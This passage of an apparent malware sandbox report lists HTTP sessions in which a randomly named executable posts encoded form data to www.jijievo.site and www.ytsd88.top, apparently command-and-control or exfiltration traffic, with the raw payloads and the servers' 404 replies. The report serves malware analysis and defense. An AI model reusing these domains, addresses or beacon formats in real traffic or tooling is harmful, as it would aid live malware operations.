                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 76 63 31 65 66 5a 42 79 79 30 2f 47 72 68 6b 42 67 61 47 34 56 69 67 46 54 47 62 34 4d 44 66 62 6c 4c 51 31 58 4c 62 41 31 42 64 30 75 67 74 72 49 37 45 34 53 78 6b 69 44 50 79 73 6c 6c 2f 4c 43 75 54 72 73 6d 43 51 66 52 78 6a 35 4f 54 74 46 2b 66 30 69 41 55 6b 6f 2f 48 7a 63 52 4a 6a 33 49 4f 62 4d 53 7a 59 6c 45 34 46 57 2b 67 48 67 77 33 63 68 50 43 6d 48 52 53 6d 32 77 68 34 4b 48 30 72 64 6e 49 69 76 6c 2b 34 55 2b 33 70 31 73 71 6d 66 35 77 6d 4e 63 76 57 36 4e 64 61 64 30 42 77 37 65 79 68 4c 48 58 78 32 76 54 77 41 37 47 6a 32 61 37 57 56 6f 48 44 6f 70 46 42 38 67 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=vc1efZByy0/GrhkBgaG4VigFTGb4MDfblLQ1XLbA1Bd0ugtrI7E4SxkiDPysll/LCuTrsmCQfRxj5OTtF+f0iAUko/HzcRJj3IObMSzYlE4FW+gHgw3chPCmHRSm2wh4KH0rdnIivl+4U+3p1sqmf5wmNcvW6Ndad0Bw7eyhLHXx2vTwA7Gj2a7WVoHDopFB8g==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449765154.90.58.209804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:09.706563950 CET742OUTPOST /z9pi/ HTTP/1.1
                                                                                      Host: www.jijievo.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.jijievo.site
                                                                                      Referer: http://www.jijievo.site/z9pi/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 76 63 31 65 66 5a 42 79 79 30 2f 47 71 42 55 42 37 35 75 34 5a 53 67 43 50 57 62 34 65 44 65 7a 6c 4c 63 31 58 4b 66 51 31 79 35 30 75 46 4a 72 4a 2f 77 34 54 78 6b 69 58 2f 7a 6f 34 31 2f 4d 43 75 65 65 73 6e 75 51 66 53 4e 6a 35 4d 4c 74 46 4a 72 33 6a 51 55 6d 6b 66 48 39 43 68 4a 6a 33 49 4f 62 4d 53 6e 2b 6c 45 77 46 57 4e 34 48 67 53 66 54 69 50 43 6c 4f 78 53 6d 6e 67 68 38 4b 48 30 46 64 6d 55 63 76 6d 47 34 55 2b 48 70 32 39 71 6e 45 70 77 67 43 38 75 41 32 4f 6c 55 45 30 70 2b 37 74 71 77 47 31 69 54 33 70 65 71 52 4b 6e 30 6b 61 66 6c 49 76 4f 33 6c 71 34 49 6e 68 51 78 54 74 38 76 71 50 62 77 73 7a 58 54 4f 4b 53 35 45 4e 59 3d
                                                                                      Data Ascii: 3vNdCBvX=vc1efZByy0/GqBUB75u4ZSgCPWb4eDezlLc1XKfQ1y50uFJrJ/w4TxkiX/zo41/MCueesnuQfSNj5MLtFJr3jQUmkfH9ChJj3IObMSn+lEwFWN4HgSfTiPClOxSmngh8KH0FdmUcvmG4U+Hp29qnEpwgC8uA2OlUE0p+7tqwG1iT3peqRKn0kaflIvO3lq4InhQxTt8vqPbwszXTOKS5ENY=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.449771154.90.58.209804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:12.367130995 CET10824OUTPOST /z9pi/ HTTP/1.1
                                                                                      Host: www.jijievo.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.jijievo.site
                                                                                      Referer: http://www.jijievo.site/z9pi/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 76 63 31 65 66 5a 42 79 79 30 2f 47 71 42 55 42 37 35 75 34 5a 53 67 43 50 57 62 34 65 44 65 7a 6c 4c 63 31 58 4b 66 51 31 79 78 30 75 32 78 72 49 59 73 34 42 42 6b 69 55 2f 7a 72 34 31 2f 52 43 75 57 61 73 6e 54 6c 66 55 42 6a 35 76 44 74 44 37 44 33 36 67 55 6d 35 50 48 77 63 52 49 68 33 4d 53 48 4d 53 33 2b 6c 45 77 46 57 49 30 48 6d 41 33 54 75 76 43 6d 48 52 53 36 32 77 68 59 4b 48 38 7a 64 6d 51 4d 6f 57 6d 34 55 65 58 70 77 50 53 6e 49 70 77 69 44 38 75 49 32 50 59 57 45 30 30 42 37 75 32 61 47 32 2b 54 32 4f 44 62 4e 72 58 32 6e 62 6a 6e 53 63 6d 64 75 5a 45 5a 69 69 41 61 57 4e 5a 33 70 2f 58 35 70 43 4b 72 53 36 53 35 5a 34 48 49 5a 61 41 43 41 39 6e 6c 31 6e 56 64 75 65 39 38 55 42 73 6f 4b 4c 75 43 31 49 5a 47 57 6a 6a 4a 77 46 4c 55 31 69 71 6d 68 55 31 35 55 35 68 49 35 65 76 34 49 71 71 58 6b 61 4c 4f 54 63 41 65 5a 65 56 70 73 41 64 67 33 45 53 45 39 6c 57 41 70 69 76 37 56 74 39 69 33 39 69 7a 4a 37 75 74 5a 59 76 55 50 72 4f 45 49 4c 66 4e 56 4d 52 57 6c [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=vc1efZByy0/GqBUB75u4ZSgCPWb4eDezlLc1XKfQ1yx0u2xrIYs4BBkiU/zr41/RCuWasnTlfUBj5vDtD7D36gUm5PHwcRIh3MSHMS3+lEwFWI0HmA3TuvCmHRS62whYKH8zdmQMoWm4UeXpwPSnIpwiD8uI2PYWE00B7u2aG2+T2ODbNrX2nbjnScmduZEZiiAaWNZ3p/X5pCKrS6S5Z4HIZaACA9nl1nVdue98UBsoKLuC1IZGWjjJwFLU1iqmhU15U5hI5ev4IqqXkaLOTcAeZeVpsAdg3ESE9lWApiv7Vt9i39izJ7utZYvUPrOEILfNVMRWlLxTwDlLFTg19DfeGw9c3c6/T3fE69RJWBZ6xV19p2pyblkZNbkzRGxd25+ENrJ5AHJl2qhCurqNTKKQ8muT0PDKxZfvREX6V07jVTrc3K6sD8Sn+rj7+fIUn0s4bfYBUVuUrJQ//91DOsI+ch6oePFv3E/p13lloQA4iBRrlAvd+hEiNiUHir6HQGEuLRxmIVq8AJpGU0lA3OV9LMRD0hlsRyUzQVRSp0x0UBocSA5rKwy+NKVFtMZkG6DWsKt6elbpKs6VuS/movdU0rYOzRvwuvIx3S/6H3Ve2RNLV6pTZGqinTnKrVqzpaNAtzln2jC97rdVxT36wtq29m+0qUuu8XNFHB5YszrDDrSLxlUqArxTgAxvNpTn7QSdM3GwHgVwy1fUvpRHQPasSneHJdN63h269u20C6BCosvuRxQJ7wfJUSQg1dZN7aUOEEEIf4BbYOQyR9B2zrZ3GZqZUrJ/PZ/GYtgB9S4BrVMEiTSLI5UOVqE0tW7nUygsR1CUXj8LEp2oAkjbucGJ6gvV9b6kioh2g3aw0ZwGQQ42kYWyRaNVczh2gmsbmrzvy+QyTCkEcjaF8t6wRgphOGjkx5Mmu0wNHEViWMT0CJlQLPiQ2kl2g1Ts/Aw4lZJkvDGlvE/XXfDwLbKOa1qyHsoXq9yoW5kjXsLjS2A [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.449777154.90.58.209804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:15.048355103 CET460OUTGET /z9pi/?3vNdCBvX=ied+cptg7UakpzhOx9uXTlAGHDuhbT7ej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipvFkLuNeVdA8j2seJJxWGnVEyQ8hCuTv0uPE=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.jijievo.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:10:16.659656048 CET197INHTTP/1.1 200 OK
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Date: Sun, 24 Nov 2024 07:10:16 GMT
                                                                                      Server: nginx
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Length: 24
                                                                                      Connection: close
                                                                                      Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                                      Data Ascii: Unable to get connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.44979847.76.213.197804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:23.275626898 CET716OUTPOST /8qt7/ HTTP/1.1
                                                                                      Host: www.ytsd88.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.ytsd88.top
                                                                                      Referer: http://www.ytsd88.top/8qt7/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 75 66 74 47 6e 37 2f 56 5a 6a 62 39 75 33 52 4b 69 75 50 54 49 6c 69 30 6b 34 30 2f 4f 44 5a 61 77 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ffuftGn7/VZjb9u3RKiuPTIli0k40/ODZaw==
                                                                                      Nov 24, 2024 08:10:24.857832909 CET574INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:10:24 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 409
                                                                                      Connection: close
                                                                                      ETag: "66d016cf-199"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.44980447.76.213.197804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:25.944946051 CET736OUTPOST /8qt7/ HTTP/1.1
                                                                                      Host: www.ytsd88.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.ytsd88.top
                                                                                      Referer: http://www.ytsd88.top/8qt7/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 65 43 39 36 46 44 66 64 6b 6d 4c 44 66 52 6d 53 63 33 56 41 45 72 76 37 4a 47 65 38 59 5a 4a 6f 36 62 4c 47 70 69 7a 78 67 58 73 37 64 6a 66 33 55 78 56 6f 62 45 51 53 47 51 6b 46 63 58 61 55 41 66 6c 30 50 64 4e 79 38 6c 49 53 50 43 52 67 6b 42 52 4a 2b 4e 44 6e 4f 45 2b 4d 55 4f 64 78 44 47 4c 49 39 46 54 38 4f 73 72 38 38 69 50 58 58 34 72 44 37 61 66 2b 4b 35 49 6d 2f 45 4c 59 6a 49 34 6f 36 4c 62 54 50 59 42 49 42 52 70 6a 78 41 79 4e 2b 51 42 36 33 6e 46 55 70 46 62 4c 6a 4d 6e 6b 6b 70 63 63 41 72 2f 37 73 3d
                                                                                      Data Ascii: 3vNdCBvX=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6dreC96FDfdkmLDfRmSc3VAErv7JGe8YZJo6bLGpizxgXs7djf3UxVobEQSGQkFcXaUAfl0PdNy8lISPCRgkBRJ+NDnOE+MUOdxDGLI9FT8Osr88iPXX4rD7af+K5Im/ELYjI4o6LbTPYBIBRpjxAyN+QB63nFUpFbLjMnkkpccAr/7s=
                                                                                      Nov 24, 2024 08:10:27.528074026 CET574INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:10:27 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 409
                                                                                      Connection: close
                                                                                      ETag: "66d016cf-199"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.44981047.76.213.197804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:28.650484085 CET10818OUTPOST /8qt7/ HTTP/1.1
                                                                                      Host: www.ytsd88.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.ytsd88.top
                                                                                      Referer: http://www.ytsd88.top/8qt7/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 57 43 39 49 39 44 66 38 6b 6d 5a 54 66 52 6f 79 63 4d 56 41 45 4d 76 34 35 43 65 38 55 4a 4a 71 43 62 5a 56 68 69 6e 51 67 58 33 4c 64 6a 41 48 55 77 4e 49 62 52 51 53 58 5a 6b 45 73 58 61 55 41 66 6c 32 48 64 5a 58 49 6c 4b 53 50 42 5a 41 6b 4e 56 4a 2b 6c 44 6d 71 55 2b 4e 67 77 63 41 6a 47 4c 6f 4e 46 63 75 57 73 32 4d 38 67 4f 58 58 67 72 44 33 52 66 2b 57 31 49 6d 4c 75 4c 59 58 49 31 74 72 4c 45 78 50 51 65 4c 70 32 33 52 39 58 38 39 47 6a 4d 39 7a 42 57 57 4e 68 49 37 66 37 2f 6d 74 48 47 4d 73 65 6b 72 51 42 2b 61 2f 31 50 4c 6f 76 5a 67 48 47 51 6c 6f 62 44 33 51 42 47 6e 4d 65 71 34 4f 4f 4b 6b 55 46 61 75 7a 6a 68 45 42 39 7a 6b 69 79 63 71 4f 47 44 38 51 45 67 75 2f 75 58 4f 5a 35 48 4a 6e 6b 44 6e 65 68 58 34 6e 36 51 6d 33 31 43 4d 48 39 62 66 73 4d 51 4b 30 62 79 5a 4d 56 46 41 6e 2b 4b 44 2f 48 76 70 42 37 46 6f 48 43 77 33 79 6c 34 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6drWC9I9Df8kmZTfRoycMVAEMv45Ce8UJJqCbZVhinQgX3LdjAHUwNIbRQSXZkEsXaUAfl2HdZXIlKSPBZAkNVJ+lDmqU+NgwcAjGLoNFcuWs2M8gOXXgrD3Rf+W1ImLuLYXI1trLExPQeLp23R9X89GjM9zBWWNhI7f7/mtHGMsekrQB+a/1PLovZgHGQlobD3QBGnMeq4OOKkUFauzjhEB9zkiycqOGD8QEgu/uXOZ5HJnkDnehX4n6Qm31CMH9bfsMQK0byZMVFAn+KD/HvpB7FoHCw3yl4YIKLP/oo+HMjwKiUFqjaUzUFmjQQs7StjXn+r/jRydG0Pfi3I3S99Chpier+Mc4TJKVjAPWOw1DkKPFuDLaNVJ9ao/BVce89ifRlnRfg0hyahlX0ejYb9zX6sshMzDdbKEaqHejU0KrWmkn9RVFkPxNkdH1BMFkSN2riEpi3xmJwrI2Lmpo0wnM5z8/nIcIzAd99S/Z2AcQTxu7sdXeTuVUAEcYNzec2Q0V9w9MkRwDlBlm6zEHWdndCNEvVusOCwiySDhSuSUgPQvc8vT5E+meJ+ta/vr19wCvSrL7lAUuckgT9wyy/9Z1m4Qnh5PhCN88AMTssBWJ5W8JHYsj8ntKqf+CEKmxm+sSzQvuqP91N18jtX4vosaDaPZgv40373pdARjG8LwYijyldio+IlZ8ZcVU4zGhfFAp8Y7AW/QFalbz+Jwopj/scVK7ZON7PFN7hK4sMgb//mace77wI2ARexSk9MZTRLA1OziVpnMDKoVyOU5L/M7jt7NGkTUk3wQ2Gjg2yOP+st0PAF54l7EF1Yo2zR99rGaclfsEVgOYzTejvj+ko7iH7p2U88xAIbAOGv0EguAXgnFGC4T61clNuBoAEuvR2unMOneSyX9E9SAMKCLjPmfLEK0H9zQM6HdCCivHLC6E4KUYut67n8mExCyx0/tjYDV [TRUNCATED]
                                                                                      Nov 24, 2024 08:10:30.245706081 CET574INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:10:29 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 409
                                                                                      Connection: close
                                                                                      ETag: "66d016cf-199"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                      Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.44981747.76.213.197804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:31.342281103 CET458OUTGET /8qt7/?3vNdCBvX=FpCuTMU+yGtduI5SdGSwoaTqY2YvqsELSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXjJlaW2N0MrSdIjCq1nBCaRQTsV/7KTtyEyY=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.ytsd88.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:10:32.893115997 CET574INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:10:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 409
                                                                                      Connection: close
                                                                                      ETag: "66d016cf-199"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
